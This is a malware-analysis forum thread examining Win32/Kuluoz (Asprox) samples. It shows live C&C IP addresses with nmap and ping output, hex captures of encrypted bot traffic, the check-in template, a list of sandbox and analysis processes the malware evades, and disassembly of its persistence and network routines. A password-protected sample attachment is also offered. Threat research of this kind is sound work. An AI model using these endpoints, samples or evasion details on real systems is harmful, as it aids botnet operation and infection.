A forum for reverse engineering, OS internals and malware analysis 

Win32/Kuluoz

Forum for analysis and discussion about malware.

Re: Win32/Kuluoz

 #21950  by unixfreaxjp
 Tue Jan 14, 2014 7:04 pm
Another new encryption: http://herrcore.blogspot.ca/2014/01/ins ... -2013.html
Unfinished analysis (too tired..) http://pastebin.com/1wF6zpPi
Sample: https://www.virustotal.com/en/file/fef7 ... /analysis/

CNC is alive:
Code: Select all
// Testing CNC..
URL: h00p://66.255.131.164:8080/index.php?r=gate <=== Alive!!!!!!!!!!
Tue Jan 14 20:05:53 JST
              2014|66.255.131.164|uslec-66-255-131-164.cust.uslec.net.|1785 |
              66.255.128.0/18 | AS-PAETEC-NET | US | USLEC.NET | TDARX INC
(Hello USA..)
 
$ ping 66.255.131.164
PING 66.255.131.164 (66.255.131.164): 56 data bytes
64 bytes from 66.255.131.164: icmp_seq=0 ttl=44 time=305.283 ms
64 bytes from 66.255.131.164: icmp_seq=1 ttl=44 time=189.028 ms
[...]
 
$ nmap (soft)
Nmap scan report for uslec-66-255-131-164.cust.uslec.net (66.255.131.164)
Host is up (0.19s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8080/tcp open  http-proxy
Attachments
pwd: infectedinfected
(88.7 KiB) Downloaded 71 times

Re: Win32/Kuluoz

 #22219  by unixfreaxjp
 Fri Feb 14, 2014 11:18 pm
Today's Kuluoz/Asprox Malvertisement
Image

VT Sample: 21 / 50 https://www.virustotal.com/en/file/360e ... /analysis/

With the confusing detection names (#PleaseFix)
Image
CNC:
Code: Select all
 85.25.108.164:443
85.25.108.164|luna740.startdedicated.com.|8972 | 85.25.0.0/16 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG
The callback:
Image

Below is the Traffic for decoding pads, 2 captures, two stations (WinXP & Win7)
Code: Select all
// Take one...

00000000  50 4f 53 54 20 2f 34 37  39 42 36 39 39 37 33 36 POST /47 9B699736
00000010  38 33 31 39 39 30 42 46  35 35 46 46 44 32 32 37 831990BF 55FFD227
00000020  37 43 44 42 33 38 45 32  46 31 39 45 35 32 45 32 7CDB38E2 F19E52E2
00000030  20 48 54 54 50 2f 31 2e  31 0d 0a 41 63 63 65 70  HTTP/1. 1..Accep
00000040  74 3a 20 2a 2f 2a 0d 0a  43 6f 6e 74 65 6e 74 2d t: */*.. Content-
00000050  54 79 70 65 3a 20 61 70  70 6c 69 63 61 74 69 6f Type: ap plicatio
00000060  6e 2f 78 2d 77 77 77 2d  66 6f 72 6d 2d 75 72 6c n/x-www- form-url
00000070  65 6e 63 6f 64 65 64 0d  0a 55 73 65 72 2d 41 67 encoded. .User-Ag
00000080  65 6e 74 3a 20 4d 6f 7a  69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
00000090  20 28 57 69 6e 64 6f 77  73 20 4e 54 20 36 2e 31  (Window s NT 6.1
000000A0  3b 20 57 4f 57 36 34 3b  20 72 76 3a 32 35 2e 30 ; WOW64;  rv:25.0
000000B0  29 20 47 65 63 6b 6f 2f  32 30 31 30 30 31 30 31 ) Gecko/ 20100101
000000C0  20 46 69 72 65 66 6f 78  2f 32 35 2e 30 0d 0a 48  Firefox /25.0..H
000000D0  6f 73 74 3a 20 38 35 2e  32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
000000E0  36 34 3a 34 34 33 0d 0a  43 6f 6e 74 65 6e 74 2d 64:443.. Content-
000000F0  4c 65 6e 67 74 68 3a 20  33 30 38 0d 0a 43 61 63 Length:  308..Cac
00000100  68 65 2d 43 6f 6e 74 72  6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
00000110  61 63 68 65 0d 0a 0d 0a  80 00 00 00 46 41 e6 45 ache.... ....FA.E
00000120  81 6f e6 0a 84 d5 a1 63  99 a0 65 bb 57 e5 e4 cc .o.....c ..e.W...
00000130  c1 a6 c6 33 be ca 73 d1  cc 02 30 87 c9 00 75 3f ...3..s. ..0...u?
00000140  42 f2 80 79 b8 c7 79 f7  8c f9 9c 7b f2 16 6d 37 B..y..y. ...{..m7
00000150  08 59 92 5e 4f 1b 97 47  08 4f 5b 9f e0 3a 29 aa .Y.^O..G .O[..:).
00000160  12 b4 db 6a be 20 10 97  a9 5c 3c 65 d4 98 d9 f8 ...j. .. .\<e....
00000170  40 fc ea d3 47 4d 8f ff  a0 0a 77 43 03 24 f1 6c @...GM.. ..wC.$.l
00000180  91 4e 95 15 1f 6e d1 3c  88 6d 41 8a 35 23 fa cb .N...n.< .mA.5#..
00000190  32 0f 55 0d e5 3a 2a 61  c2 8d 83 37 ac 00 00 00 2.U..:*a ...7....
000001A0  14 a9 f9 fe 25 f2 dc 9d  6d da 75 3e c6 9a 4d 4f ....%... m.u>..MO
000001B0  e9 72 20 6e a4 ec ac 4b  0f 53 e7 74 8d 5f 09 da .r n...K .S.t._..
000001C0  f0 86 d4 6f c7 9c d3 e0  dc 3e 22 33 c0 64 6a f9 ...o.... .>"3.dj.
000001D0  3e ad 22 c7 52 2d 59 46  75 ce 47 7e 68 77 b2 6b >.".R-YF u.G~hw.k
000001E0  66 1c ce a4 38 df bd d0  b3 65 9e c4 0a 20 d9 5b f...8... .e... .[
000001F0  d5 29 ed e2 b0 78 e6 22  ac 08 b3 c2 66 59 88 38 .)...x." ....fY.8
00000200  e6 40 fc 12 b7 71 4a 6c  f5 6a bd 5d 9b 2a 82 26 .@...qJl .j.].*.&
00000210  44 9b b3 2a f3 12 be d0  83 8d ec 12 a2 a2 b9 58 D..*.... .......X
00000220  e8 e3 5d 74 53 0b c6 be  09 b6 e8 bc 69 b0 86 fa ..]tS... ....i...
00000230  77 7d 60 99 50 bd 2e 54  e4 bb 2c 54 07 67 1a 23 w}`.P..T ..,T.g.#
00000240  d8 00 86 23 00 66 f3 a3  2a 81 e9 47             ...#.f.. *..G
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 31 .Server:  nginx/1
    00000020  2e 32 2e 36 0d 0a 44 61  74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
    00000030  20 31 34 20 46 65 62 20  32 30 31 34 20 31 35 3a  14 Feb  2014 15:
    00000040  30 38 3a 35 32 20 47 4d  54 0d 0a 43 6f 6e 74 65 08:52 GM T..Conte
    00000050  6e 74 2d 54 79 70 65 3a  20 74 65 78 74 2f 68 74 nt-Type:  text/ht
    00000060  6d 6c 3b 20 63 68 61 72  73 65 74 3d 75 74 66 2d ml; char set=utf-
    00000070  38 0d 0a 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
    00000080  64 69 6e 67 3a 20 63 68  75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
    00000090  6f 6e 6e 65 63 74 69 6f  6e 3a 20 63 6c 6f 73 65 onnectio n: close
    000000A0  0d 0a 0d 0a 65 66 0d 0a  80 00 00 00 07 6a 06 61 ....ef.. .....j.a
    000000B0  12 2c 66 a2 d3 00 14 36  9d 35 60 ac ec d6 14 7b .,f....6 .5`....{
    000000C0  7e f3 70 59 96 41 09 9d  7c 82 c7 58 d9 82 d9 e9 ~.pY.A.. |..X....
    000000D0  44 eb 6d 98 50 41 3f 38  34 04 39 c5 da 51 72 c7 D.m.PA?8 4.9..Qr.
    000000E0  12 af 62 16 14 b4 59 66  4e b2 2f 54 8e 23 86 dd ..b...Yf N./T.#..
    000000F0  b4 e4 b0 01 d5 6d 0b 60  77 4c 02 7b 60 8a 7b 74 .....m.` wL.{`.{t
    00000100  27 ae 68 18 53 96 9b 02  d1 72 bc 8b 03 36 e0 0b '.h.S... .r...6..
    00000110  bf e2 8c 4c 14 d9 7d f0  53 12 e0 2b a2 26 12 c7 ...L..}. S..+.&..
    00000120  94 8f 60 04 40 9b 46 a1  a4 51 af c1 67 00 00 00 ..`.@.F. .Q..g...
    00000130  14 a9 f9 fe 25 f2 dc 9d  6d da 4c 3a 1d b5 4d 4f ....%... m.L:..MO
    00000140  db b2 20 3e b4 33 09 ae  ea 67 ca 86 06 a0 09 ae .. >.3.. .g......
    00000150  b4 25 6f c2 5b 53 5a 22  78 87 ec 95 0d 63 5f 49 .%o.[SZ" x....c_I
    00000160  09 54 54 be 5d 20 3b a7  5f 8d d3 09 8c be 8e 8d .TT.] ;. _.......
    00000170  b8 cc a9 8b ea 47 fc 30  1e 7e 1e fc d1 68 ec ef .....G.0 .~...h..
    00000180  84 25 50 90 f3 a9 4f 6c  b3 fa d4 36 08 5b 59 92 .%P...Ol ...6.[Y.
    00000190  f9 fc 9c 87 f5 1a df 0d  0a 30 0d 0a 0d 0a       ........ .0....

// Take two...

00000000  50 4f 53 54 20 2f 44 43  43 35 32 33 44 43 38 34 POST /DC C523DC84
00000010  42 41 41 35 46 44 46 37  38 35 36 46 39 38 46 37 BAA5FDF7 856F98F7
00000020  39 30 35 46 38 38 38 33  42 32 43 38 36 33 43 30 905F8883 B2C863C0
00000030  20 48 54 54 50 2f 31 2e  31 0d 0a 41 63 63 65 70  HTTP/1. 1..Accep
00000040  74 3a 20 2a 2f 2a 0d 0a  43 6f 6e 74 65 6e 74 2d t: */*.. Content-
00000050  54 79 70 65 3a 20 61 70  70 6c 69 63 61 74 69 6f Type: ap plicatio
00000060  6e 2f 78 2d 77 77 77 2d  66 6f 72 6d 2d 75 72 6c n/x-www- form-url
00000070  65 6e 63 6f 64 65 64 0d  0a 55 73 65 72 2d 41 67 encoded. .User-Ag
00000080  65 6e 74 3a 20 4d 6f 7a  69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
00000090  20 28 57 69 6e 64 6f 77  73 20 4e 54 20 36 2e 31  (Window s NT 6.1
000000A0  3b 20 57 4f 57 36 34 3b  20 72 76 3a 32 35 2e 30 ; WOW64;  rv:25.0
000000B0  29 20 47 65 63 6b 6f 2f  32 30 31 30 30 31 30 31 ) Gecko/ 20100101
000000C0  20 46 69 72 65 66 6f 78  2f 32 35 2e 30 0d 0a 48  Firefox /25.0..H
000000D0  6f 73 74 3a 20 38 35 2e  32 35 2e 31 30 38 2e 31 ost: 85. 25.108.1
000000E0  36 34 3a 34 34 33 0d 0a  43 6f 6e 74 65 6e 74 2d 64:443.. Content-
000000F0  4c 65 6e 67 74 68 3a 20  33 30 39 0d 0a 43 61 63 Length:  309..Cac
00000100  68 65 2d 43 6f 6e 74 72  6f 6c 3a 20 6e 6f 2d 63 he-Contr ol: no-c
00000110  61 63 68 65 0d 0a 0d 0a  80 00 00 00 f1 47 79 19 ache.... .....Gy.
00000120  3f 84 3c f8 82 0f df f0  5c 88 a2 77 17 4c 24 0d ?.<..... \..w.L$.
00000130  58 20 03 b0 7c 0a f0 f7  f8 59 0a 91 28 9c fa 05 X ..|... .Y..(...
00000140  15 7e e6 2b 69 ab 0a 50  89 95 8e 19 12 57 3f 1b .~.+i..P .....W?.
00000150  11 7e 74 4e 11 c5 b1 a8  f5 48 61 2e f0 c2 89 97 .~tN.... .Ha.....
00000160  ab 6c 2a ec c6 bd bd a3  20 d6 b6 d0 d6 5e e7 5a .l*.....  ....^.Z
00000170  b2 c6 74 d9 88 91 d6 7d  86 ac 60 a1 53 81 a1 6e ..t....} ..`.S..n
00000180  9f 2d ce b4 dc f5 d9 36  d1 ad 31 00 10 cb 11 07 .-.....6 ..1.....
00000190  7a a2 c0 89 8c 84 63 9b  ed 8c 5e 52 ad 00 00 00 z.....c. ..^R....
000001A0  31 95 f9 a1 4d 42 70 93  dd 40 0b 1f c5 27 5e cd 1...MBp. .@...'^.
000001B0  83 30 91 c8 59 c4 bf 70  2f a0 04 31 c7 28 f9 6e .0..Y..p /..1.(.n
000001C0  bc b4 16 e7 42 11 16 b2  6e a6 1c 33 ca 60 1e 4d ....B... n..3.`.M
000001D0  3c 9e 8f 93 20 8c e0 3c  c3 56 a5 3e 72 b9 97 2e <... ..< .V.>r...
000001E0  7f d3 68 e2 ea 78 b0 96  74 e3 06 4a 01 1f 92 f2 ..h..x.. t..J....
000001F0  27 60 e6 29 b8 92 1e 65  02 8e a4 58 4f e2 72 8b '`.)...e ...XO.r.
00000200  9d 23 09 d3 93 ff 09 aa  a3 65 90 03 ae bb 52 c8 .#...... .e....R.
00000210  22 b8 70 10 b8 c9 04 3f  72 ea 38 d0 96 75 69 67 ".p....? r.8..uig
00000220  e3 25 f1 f0 d8 4c 7f df  b0 79 96 0f f9 1e 0f 61 .%...L.. .y.....a
00000230  27 1c 3d 11 e4 78 f7 a4  84 dc 66 05 b4 c8 07 8a '.=..x.. ..f.....
00000240  f5 a6 95 a6 6b 5e 85 b1  6f cc 81 a9 72          ....k^.. o...r
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 31 .Server:  nginx/1
    00000020  2e 32 2e 36 0d 0a 44 61  74 65 3a 20 46 72 69 2c .2.6..Da te: Fri,
    00000030  20 31 34 20 46 65 62 20  32 30 31 34 20 31 34 3a  14 Feb  2014 14:
    00000040  33 36 3a 32 36 20 47 4d  54 0d 0a 43 6f 6e 74 65 36:26 GM T..Conte
    00000050  6e 74 2d 54 79 70 65 3a  20 74 65 78 74 2f 68 74 nt-Type:  text/ht
    00000060  6d 6c 3b 20 63 68 61 72  73 65 74 3d 75 74 66 2d ml; char set=utf-
    00000070  38 0d 0a 54 72 61 6e 73  66 65 72 2d 45 6e 63 6f 8..Trans fer-Enco
    00000080  64 69 6e 67 3a 20 63 68  75 6e 6b 65 64 0d 0a 43 ding: ch unked..C
    00000090  6f 6e 6e 65 63 74 69 6f  6e 3a 20 63 6c 6f 73 65 onnectio n: close
    000000A0  0d 0a 0d 0a 66 35 0d 0a  80 00 00 00 5e be 4e a5 ....f5.. ....^.N.
    000000B0  91 74 d2 a7 f1 61 c8 0a  57 46 12 0c 61 62 11 22 .t...a.. WF..ab."
    000000C0  61 0f 87 6b ac 12 3e 87  9d 71 57 59 82 fd ce 87 a..k..>. .qWY....
    000000D0  8e 2c 8a fa a6 b6 d8 f8  03 d8 38 f7 09 59 9d d5 .,...... ..8..Y..
    000000E0  f6 6d b9 72 79 ea f9 be  b9 9d 66 94 92 f8 59 c2 .m.ry... ..f...Y.
    000000F0  7d 6a 4b bd 19 4b 77 8d  06 6e e3 93 d6 46 24 15 }jK..Kw. .n...F$.
    00000100  f9 b2 35 d1 74 9d 2e 76  68 67 8a 0c d1 83 ef 0b ..5.t..v hg......
    00000110  b0 0f e0 a6 80 98 b3 14  0e e1 e3 c0 2f 6e 0b 73 ........ ..../n.s
    00000120  c6 fa 2a 74 1d 78 b0 7a  0e 0d a0 20 6d 00 00 00 ..*t.x.z ... m...
    00000130  31 95 f9 a1 4d 42 70 93  dd 40 ec 83 d9 19 5e cd 1...MBp. .@....^.
    00000140  93 f0 91 98 49 3b 18 b0  ca b1 29 c3 4c d7 f9 1a ....I;.. ..).L...
    00000150  f8 16 95 58 ed a4 3d 35  c7 cf 0f 7e 63 d2 8e ce ...X..=5 ...~c...
    00000160  4c 39 a4 c1 9b 58 e0 7c  3f 08 9e 36 7f 3c 1a 67 L9...X.| ?..6.<.g
    00000170  43 22 58 b1 09 e4 8a ab  b2 27 fa 6c 03 b7 c1 83 C"X..... .'.l....
    00000180  bf bb 4a f9 b1 64 3c de  53 14 92 51 c6 67 bc e1 ..J..d<. S..Q.g..
    00000190  18 f3 b1 58 88 1a a5 24  70 00 bb 6c 9a 0d 0a 30 ...X...$ p..l...0
    000001A0  0d 0a 0d 0a                                      ....
Summary of this version: noted: 3minutes sleep time.
Code: Select all
================================================================================
Size:	134656
MD5:	22f7171ebb630b38cbfc288ccfea9b91
SHA1:	fae4a4bb291577379e15ea244d004667b902ab80
SHA256:	360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe
VT:     https://www.virustotal.com/en/file/360e964ae4aaf043ea27780f20ab266bf55470e3d58fa20550c9f2c520823fbe/analysis/
================================================================================

PE Information

Sections:
   .text 0x1000 0x11cce 73216
   .code 0x13000 0x1a5 512
   .rdata 0x14000 0x300e 12800
   .data 0x18000 0xe1dc 45056
   .rsrc 0x27000 0x720 2048

[0x00000000:0x00400000]> x
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   2F 32 53 74 6B 53 3D 27 6B 53 3D 27 6B 53 3D 27    /2StkS='kS='kS='
0090   4C 95 40 27 7B 53 3D 27 4C 95 53 27 73 53 3D 27    L.@'{S='L.S'sS='
[...]

[0x00000000:0x00400000]> !date
Sat Feb 15 07:14:24 JST 2014


// ===========
// SUMMARY
// ===========

// Compiler..

Microsoft Visual C++ Runtime Library

// Same templates:

<knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time>
<version>%d</version><status>%d</status><debug>%s</debug></knock>

// autostart..as usual too..

Software\Microsoft\Windows\CurrentVersion\Run

// Attached is typical first Kuluoz latest ver callback
(pic)

// Detected software:

 wireshark.exe
 vmusrvc.exe
 VBoxService.exe
 SharedIntApp.exe
 prl_tools.exe
 prl_cc.exe
 vmsrvc.exe
 vmtoolsd.exe
 iptools.exe
 VBoxTray.exe

// Public key for decrypt:

-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx
+bAndp+Cz6+5I Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqwj
wxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U 00SNFZ88nyVv33z
9+wIDAQAB -----END PUBLIC KEY-----

// gates path:

/index.php?r=gate

// template URL

http://%[^:]:%d/%s

// CNC Reply decoded:

STATUS_NO_CALLBACK_ACTIVE
Reversing Notes..
Code: Select all
// Anti Debug??

0x38000E   pop ebx   
0x38000F   sub ebx, 13h   
0x380012   call 0x380224h   target: 0x380224
0x380017   or eax, eax   
0x380019   je 0x380141h   target: 0x380141
0x38001F   call dword ptr [ebx+00000525h]   GetProcessHeap@KERNEL32.DLL [0 Params]

// The self copy..

0x8D3BE0   call dword ptr [0x8DE0A0h]   CreateFileA@KERNEL32.DLL [7 Params]
0x8D3BE6   mov dword ptr [ebp-0Ch], eax   
0x8D3BE9   cmp dword ptr [ebp-0Ch], 00000000h   
0x8D3BED   je 0x8D3C21h   target: 0x8D3C21
0x8D3BEF   push 00000000h   
0x8D3BF1   lea ecx, dword ptr [ebp-04h]   
0x8D3BF4   push ecx   
0x8D3BF5   mov edx, dword ptr [ebp+0Ch]   
0x8D3BF8   push edx   
0x8D3BF9   mov eax, dword ptr [ebp+08h]   
0x8D3BFC   push eax   
0x8D3BFD   mov ecx, dword ptr [ebp-0Ch]   
0x8D3C00   push ecx   
0x8D3C01   call dword ptr [0x8DE0A4h]   WriteFile@KERNEL32.DLL [5 Params]
0x8D3C07   test eax, eax   
0x8D3C09   je 0x8D3C17h   target: 0x8D3C17


// Create process (svchost.exe)

0x4114F7   push 0x4010C8h   ASCII "svchost.exe"
0x4114FC   push 00000000h   
0x4114FE   call dword ptr [0x40100Ch]   CreateProcessA@KERNEL32.DLL [10 Params]
00411504   mov eax, dword ptr [ebp-000000ECh]   


// Specifically check the timezone...

0x41002A   push 0x425FC0h   xref: 0x41001B
0x41002F   call dword ptr [0x4140F0h]   GetTimeZoneInformation@KERNEL32.DLL [1 Params]
0x410035   cmp eax, edi   
0x410037   je 0x4100FFh   target: 0x4100FF
0x41003D   xor ecx, ecx   
0x41003F   inc ecx   

// sleep...so long. why??

0x8D581A   call dword ptr [0x8DE088h]   Sleep@KERNEL32.DLL [1 Params]
0x8D5820   jmp 0x8D5831h   xref: 0x8D5813 target: 0x8D5831
0x8D5822   mov eax, dword ptr [ebp-00000248h]   xref: 0x8D57F4

  [...]

0x8D583F   call dword ptr [0x8DE088h]   Sleep@KERNEL32.DLL [1 Params]
0x8D5845   mov dword ptr [ebp-00000248h], 00000000h   


// opening some services riding on svchost..[some, I pasted one of em]

0x1003229   call dword ptr [0x1001124h]   RpcServerUnregisterIfEx@RPCRT4.DLL [3 Params]
0x100322F   mov esi, 0x1004094h   
0x1003234   push esi   
0x1003235   mov edi, eax   
0x1003237   call dword ptr [0x100x1068h]   EnterCriticalSection@KERNEL32.DLL [Unknown Params]
0x100323D   dec dword ptr [0x1004090h]   
0x1003243   jne 0x1003253h   target: 0x1003253
0x1003245   push 00000000h   
0x1003247   call dword ptr [0x1001144h]   RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
0x100324D   call dword ptr [0x1001128h]   RpcMgmtWaitServerListen@RPCRT4.DLL [Unknown Params]
0x1003253   push esi   xref: 0x1003243
0x1003254   call dword ptr [0x100x1060h]   LeaveCriticalSection@KERNEL32.DLL [Unknown Params]
0x100325A   push edi   
0x100325B   call dword ptr [0x1001140h]   I_RpcMapWin32Status@RPCRT4.DLL [1 Params]

// Retrieving system's user information:
// User Name

0x8D2470   push ebp   xref: 0x8D4F76
0x8D2471   mov ebp, esp   
0x8D2473   sub esp, 0000009Ch   
0x8D2479   mov dword ptr [ebp-1Ch], 00000000h   
0x8D2480   mov dword ptr [ebp-08h], 00000000h   
0x8D2487   mov dword ptr [ebp-18h], 00000000h   
0x8D248E   lea eax, dword ptr [ebp-18h]   
0x8D2491   push eax   
0x8D2492   push 00000000h   
0x8D2494   call dword ptr [0x8DE02Ch]   GetUserNameA@ADVAPI32.DLL [2 Params]
0x8D249A   mov ecx, dword ptr [ebp-18h]   
0x8D249D   add ecx, 01h   
0x8D24A0   push ecx   
0x8D24A1   push 000000x8h   
0x8D24A3   call dword ptr [0x8DE0ACh]   GetProcessHeap@KERNEL32.DLL [0 Params]
0x8D24A9   push eax   
0x8D24AA   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D24B0   mov dword ptr [ebp-24h], eax   
0x8D24B3   lea edx, dword ptr [ebp-18h]   
0x8D24B6   push edx   
0x8D24B7   mov eax, dword ptr [ebp-24h]   
0x8D24BA   push eax   
0x8D24BB   call dword ptr [0x8DE02Ch]   GetUserNameA@ADVAPI32.DLL [2 Params]
0x8D24C1   mov dword ptr [ebp-18h], 00000000h   
0x8D24C8   mov dword ptr [ebp-00000094h], 00000000h   
0x8D24D2   lea ecx, dword ptr [ebp-0Ch]   
0x8D24D5   push ecx   
0x8D24D6   lea edx, dword ptr [ebp-00000094h]   
0x8D24DC   push edx   
0x8D24DD   push 00000000h   
0x8D24DF   lea eax, dword ptr [ebp-18h]   
0x8D24E2   push eax   

// Account Name...

0x8D24E3   push 00000000h   
0x8D24E5   mov ecx, dword ptr [ebp-24h]   
0x8D24E8   push ecx   
0x8D24E9   push 00000000h   
0x8D24EB   call dword ptr [0x8DE030h]   LookupAccountNameA@ADVAPI32.DLL [7 Params]
0x8D24F1   mov edx, dword ptr [ebp-18h]   
0x8D24F4   push edx   
0x8D24F5   push 000000x8h   
0x8D24F7   call dword ptr [0x8DE0ACh]   GetProcessHeap@KERNEL32.DLL [0 Params]
0x8D24FD   push eax   
0x8D24FE   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2504   mov dword ptr [ebp-08h], eax   
0x8D2507   mov eax, dword ptr [ebp-00000094h]   
0x8D250D   add eax, 01h   
0x8D2510   push eax   
0x8D2511   push 000000x8h   
0x8D2513   call dword ptr [0x8DE0ACh]   GetProcessHeap@KERNEL32.DLL [0 Params]
0x8D2519   push eax   
0x8D251A   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2520   mov dword ptr [ebp-1Ch], eax   
0x8D2523   lea ecx, dword ptr [ebp-0Ch]   
0x8D2526   push ecx   
0x8D2527   lea edx, dword ptr [ebp-00000094h]   
0x8D252D   push edx   
0x8D252E   mov eax, dword ptr [ebp-1Ch]   
0x8D2531   push eax   
0x8D2532   lea ecx, dword ptr [ebp-18h]   
0x8D2535   push ecx   
0x8D2536   mov edx, dword ptr [ebp-08h]   
0x8D2539   push edx   
0x8D253A   mov eax, dword ptr [ebp-24h]   
0x8D253D   push eax   
0x8D253E   push 00000000h   
0x8D2540   call dword ptr [0x8DE030h]   LookupAccountNameA@ADVAPI32.DLL [7 Params]
0x8D2546   mov dword ptr [ebp-10h], 00000000h   
0x8D254D   mov dword ptr [ebp-20h], 00000004h   
0x8D2554   lea ecx, dword ptr [ebp-04h]   

// Query Registry version Name...

0x8D2557   push ecx   
0x8D2558   push 00000001h   
0x8D255A   push 00000000h   
0x8D255C   push 0x8DE1FCh   ASCII "Software\Microsoft\Windows NT\CurrentVersion"
0x8D2561   push 80000002h   
0x8D2566   call dword ptr [0x8DE034h]   RegOpenKeyExA@ADVAPI32.DLL [5 Params]
0x8D256C   test eax, eax   
0x8D256E   jne 0x8D25A4h   target: 0x8D25A4
0x8D2570   mov dword ptr [ebp-00000098h], 00000004h   
0x8D257A   lea edx, dword ptr [ebp-20h]   
0x8D257D   push edx   
0x8D257E   lea eax, dword ptr [ebp-10h]   
0x8D2581   push eax   
0x8D2582   lea ecx, dword ptr [ebp-00000098h]   
0x8D2588   push ecx   
0x8D2589   push 00000000h   
0x8D258B   push 0x8DE22Ch   ASCII "InstallDate"
0x8D2590   mov edx, dword ptr [ebp-04h]   
0x8D2593   push edx   
0x8D2594   call dword ptr [0x8DE038h]   RegQueryValueExA@ADVAPI32.DLL [6 Params]
0x8D259A   mov eax, dword ptr [ebp-04h]   
0x8D259D   push eax   
0x8D259E   call dword ptr [0x8DE03Ch]   RegCloseKey@ADVAPI32.DLL [1 Params]
0x8D25A4   push 00001000h   xref: 0x8D256E
0x8D25A9   push 00000000h   
0x8D25AB   mov ecx, dword ptr [0x8E12D8h]   0x00AC0000
0x8D25B1   push ecx   
[...]

// Query Registry InstallDate,,,

0x8D255C   push 0x8DE1FCh   		ASCII "Software\Microsoft\Windows NT\CurrentVersion"
0x8D2561   push 80000002h   
0x8D2566   call dword ptr [0x8DE034h]   RegOpenKeyExA@ADVAPI32.DLL [5 Params]
0x8D256C   test eax, eax   
0x8D256E   jne 0x8D25A4h   target: 0x8D25A4
0x8D2570   mov dword ptr [ebp-00000098h], 00000004h   
0x8D257A   lea edx, dword ptr [ebp-20h]   
0x8D257D   push edx   
0x8D257E   lea eax, dword ptr [ebp-10h]   
0x8D2581   push eax   
0x8D2582   lea ecx, dword ptr [ebp-00000098h]   
0x8D2588   push ecx   
0x8D2589   push 00000000h   
0x8D258B   push 0x8DE22Ch   		ASCII "InstallDate"
0x8D2590   mov edx, dword ptr [ebp-04h]   
0x8D2593   push edx   
0x8D2594   call dword ptr [0x8DE038h]   RegQueryValueExA@ADVAPI32.DLL [6 Params]
0x8D259A   mov eax, dword ptr [ebp-04h]   
0x8D259D   push eax   
0x8D259E   call dword ptr [0x8DE03Ch]   RegCloseKey@ADVAPI32.DLL [1 Params]


// Internet connection to send POST...

0x8D2C00   push ebp   xref: 0x8D2FDB
0x8D2C01   mov ebp, esp   
0x8D2C03   sub esp, 34h   
0x8D2C06   mov dword ptr [ebp-08h], 00000000h   
0x8D2C0D   push 00001000h   
0x8D2C12   push 00000000h   
0x8D2C14   mov eax, dword ptr [008E12D8h]   0x00AC0000
0x8D2C19   push eax   
0x8D2C1A   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2C20   mov dword ptr [ebp-14h], eax   
0x8D2C23   push 00001000h   
0x8D2C28   push 00000000h   
0x8D2C2A   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x8D2C30   push ecx   
0x8D2C31   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2C37   mov dword ptr [ebp-0Ch], eax   
0x8D2C3A   mov edx, dword ptr [ebp-0Ch]   
0x8D2C3D   push edx   
0x8D2C3E   lea eax, dword ptr [ebp-1Ch]   
0x8D2C41   push eax   
0x8D2C42   mov ecx, dword ptr [ebp-14h]   
0x8D2C45   push ecx   
0x8D2C46   push 0x8DE2D0h   ASCII       "http://%[^:]:%d/%s"
0x8D2C4B   mov edx, dword ptr [ebp+08h]   
0x8D2C4E   push edx   
0x8D2C4F   call dword ptr [008E12B4h]   sscanf@NTDLL.DLL [0 Params]
0x8D2C55   add esp, 14h   
0x8D2C58   push 00001000h   
0x8D2C5D   push 00000000h   
0x8D2C5F   mov eax, dword ptr [008E12D8h]   0x00AC0000
0x8D2C64   push eax   
0x8D2C65   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2C6B   mov dword ptr [ebp-18h], eax   
0x8D2C6E   mov ecx, dword ptr [ebp+10h]   
0x8D2C71   mov edx, dword ptr [ebp+18h]   
0x8D2C74   lea eax, dword ptr [edx+ecx+00001000h]   
0x8D2C7B   push eax   
0x8D2C7C   push 00000000h   
0x8D2C7E   mov ecx, dword ptr [008E12D8h]   0x00AC0000
